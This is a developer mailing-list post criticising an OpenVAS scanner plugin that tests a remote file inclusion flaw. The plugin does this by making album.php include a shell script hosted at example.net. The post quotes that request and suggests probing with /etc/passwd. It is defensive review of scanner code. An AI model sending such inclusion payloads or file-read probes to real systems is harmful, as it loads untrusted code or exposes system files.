Hi, I really don't think that plugins should be running with references to injection code that is hosted on an uncontrolled 3rd party site. That allows for introducing untrusted code into the scanner.
I may be wrong in terms of how the vulnerable album.php operates, but if it truly does do an include, this is not the way to test it. Instead, on *IX systems, the typical mode of operation is to include a file such as /etc/passwd and grep for 'root' (see Yap_Blog_remote-file_include.nasl for an example), or check phpWebThings_35313.nasl for an example on how to check for a vulnerability on either *IX or MS. Thomas > trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl e > + sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" + > + "SECURITY_FILE=http://example.net/shell.php";, > port:dmfPort); _______________________________________________ Openvas-devel mailing list Openvas-devel@wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
